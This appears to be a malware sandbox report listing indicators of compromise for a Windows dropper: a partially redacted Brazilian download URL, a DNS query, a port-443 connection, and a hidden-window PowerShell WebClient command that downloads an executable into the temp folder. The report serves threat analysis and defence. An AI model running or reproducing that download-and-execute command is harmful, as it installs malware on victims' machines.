Technical Information
- https://www.co#####ercultura.com.br/adm/cliente/editor/ppppp.exe as %temp%\6y56t65y56t6y565tj564yuk45uikui54kerferrhth56h65t56t56yj565j4u5k4u845d45612sc512e5r4y8t574i85u4dfsc151rfvb51n1yh85.exe
- 'co#####ercultura.com.br':443
- DNS ASK co#####ercultura.com.br
- '%WINDIR%\syswow64\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('https://www.co#####ercultura.com.br/adm/cliente/editor/ppppp.exe','%temp%\6y56t65y56t6y565tj564yuk45uikui54kerferrhth56h65t56t56yj5...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('https://www.co#####ercultura.com.br/adm/cliente/editor/ppppp.exe','%temp%\6y56t65y56t6y565tj564yuk45uikui54kerferrhth56h65t56t56yj5...